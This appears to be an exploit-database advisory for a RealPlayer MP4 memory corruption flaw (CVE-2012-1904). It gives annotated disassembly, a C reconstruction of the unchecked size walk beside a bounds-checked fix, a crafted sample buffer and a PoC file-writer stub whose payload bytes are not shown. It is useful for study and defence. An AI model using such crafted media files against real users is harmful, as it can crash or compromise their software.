RealPlayer .mp4 File Handling Memory Corruption Exploit

Summary

RealPlayer .mp4 file handling suffers from a memory corruption vulnerability.

Credit:

The information has been provided by Julien Ahrens.
The information has been provided by Senator of Pirates.


Details

Vulnerable Systems:
 * RealPlayer .mp4 file handling

Memory corruption occurs during the handling of MP4 files. The function sub_61177240 reads 32-bit big-endian size values from the file and adds each one directly to the data pointer without checking it against the end of the buffer, so a crafted size field yields an attacker-controlled pointer that the caller later dereferences.

From mp4fformat.dll:

61177240 55 PUSH EBP
61177241 8BEC MOV EBP,ESP
61177243 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] ; ECX = number of atoms to skip
61177246 85C9 TEST ECX,ECX ; ECX = 00000001
61177248 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; EAX = pointer into the file data
6117724B 74 22 JE SHORT mp4fform.6117726F ; the jump is not taken
6117724D 56 PUSH ESI
6117724E 8BFF MOV EDI,EDI
61177250 0FB670 02 MOVZX ESI,BYTE PTR DS:[EAX+2] ; loop start: assemble the 32-bit big-endian size from [EAX..EAX+3]
61177254 33D2 XOR EDX,EDX
61177256 8A30 MOV DH,BYTE PTR DS:[EAX]
61177258 8A50 01 MOV DL,BYTE PTR DS:[EAX+1]
6117725B C1E2 08 SHL EDX,8
6117725E 0BD6 OR EDX,ESI
61177260 0FB670 03 MOVZX ESI,BYTE PTR DS:[EAX+3]
61177264 C1E2 08 SHL EDX,8
61177267 0BD6 OR EDX,ESI ; EDX = size field taken verbatim from the file
61177269 03C2 ADD EAX,EDX ; EAX += size, with no check against the end of the buffer
6117726B 49 DEC ECX
6117726C ^75 E2 JNZ SHORT mp4fform.61177250
6117726E 5E POP ESI
6117726F 5D POP EBP
61177270 C2 0800 RETN 8 ; returns the attacker-influenced pointer in EAX

61177FE9 8B4E 24 MOV ECX,DWORD PTR DS:[ESI+24]
61177FEC 33D2 XOR EDX,EDX
61177FEE 8946 08 MOV DWORD PTR DS:[ESI+8],EAX ; EAX = pointer derived from the unchecked size value
61177FF1 8A70 0E MOV DH,BYTE PTR DS:[EAX+E] ; read through that pointer: an invalid address crashes the player
61177FF4 8A50 0F MOV DL,BYTE PTR DS:[EAX+F]
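To make the loop concrete, the following is an added example written for this page (not RealPlayer's code and not the advisory author's): it reconstructs the atom-skipping walk from the disassembly above in C, places a bounds-checked form beside it, and runs both over a constructed 32-byte buffer whose first size field is 0x41414141. The function and buffer names are this example's own, and the sample bytes are constructed here, not taken from the elided PoC.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Assemble a 32-bit big-endian value the way the loop at 61177250 does:
 * byte 0 into DH, byte 1 into DL, then shift in bytes 2 and 3. */
static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Vulnerable form, mirroring sub_61177240: skip `count` atoms by adding each
 * atom's size field to the data pointer. Nothing compares the size against the
 * end of the buffer. The walk is kept as an offset so that this function can be
 * called on a crafted header with count == 1 without dereferencing out of
 * bounds itself; with count > 1 it would, exactly like the DLL. */
size_t skip_atoms_unchecked(const uint8_t *buf, size_t count)
{
    size_t off = 0;
    while (count--) {
        uint32_t size = be32(buf + off);
        off += size;            /* attacker-controlled; no bounds check */
    }
    return off;
}

/* Hardened form. Every atom header (4-byte size + 4-byte type) must fit in the
 * remaining bytes, the size must cover at least the header, and the atom must
 * end inside the buffer. Sizes 0 and 1 ("to end of file" and 64-bit largesize)
 * are legal in ISO BMFF but are rejected here to keep the example short.
 * Returns 0 and stores the offset of the next atom on success, -1 on
 * malformed input. */
int skip_atoms_checked(const uint8_t *buf, size_t len, size_t count, size_t *next)
{
    size_t off = 0;
    while (count--) {
        if (len - off < 8)
            return -1;                  /* header would run past the end */
        uint32_t size = be32(buf + off);
        if (size < 8 || size > len - off)
            return -1;                  /* shorter than its header, or overlong */
        off += size;
    }
    *next = off;
    return 0;
}

/* Mirrors the caller at 61177FE9, which reads bytes 0xE and 0xF relative to the
 * pointer returned by the skip routine. Returns 1 if both bytes lie inside the
 * buffer, 0 if the DLL would touch an invalid address. */
int caller_read_in_bounds(size_t off, size_t len)
{
    return off <= len && len - off >= 0x10;
}

/* Constructed sample data (not from the original PoC): two well-formed
 * 16-byte atoms, and a copy whose first size field is 0x41414141. */
const uint8_t good_mp4[32] = {
    0x00,0x00,0x00,0x10, 'f','t','y','p', 'i','s','o','m', 0x00,0x00,0x02,0x00,
    0x00,0x00,0x00,0x10, 'f','r','e','e', 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
};
const uint8_t bad_mp4[32] = {
    0x41,0x41,0x41,0x41, 'f','t','y','p', 'i','s','o','m', 0x00,0x00,0x02,0x00,
    0x00,0x00,0x00,0x10, 'f','r','e','e', 0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,
};

int main(void)
{
    size_t next;
    size_t off = skip_atoms_unchecked(bad_mp4, 1);
    printf("unchecked walk lands at offset 0x%zx of a %zu-byte buffer; "
           "caller read in bounds: %d\n",
           off, sizeof bad_mp4, caller_read_in_bounds(off, sizeof bad_mp4));
    if (skip_atoms_checked(bad_mp4, sizeof bad_mp4, 1, &next) < 0)
        printf("checked walk rejects the crafted size field\n");
    if (skip_atoms_checked(good_mp4, sizeof good_mp4, 1, &next) == 0)
        printf("checked walk: next atom at offset %zu\n", next);
    return 0;
}
```

The checked walk validates the size field twice: once against the header it must at least cover, and once against the bytes that remain, so a size of 0x41414141 in a 32-byte buffer is refused before it can become a pointer. In the DLL the addition happens in 32-bit EAX and wraps, which is why a large size field can land anywhere in the address space rather than only past the end of the mapping.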

############################################################################################################
Code:
——
PoC = ('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

payload = (PoC)
f = open('PoC.mp4', 'wb')
f.write(payload)
f.close()

CVE Information:
CVE-2012-1904

Disclosure Timeline:
Published: 2012-03-24

Categories: Exploits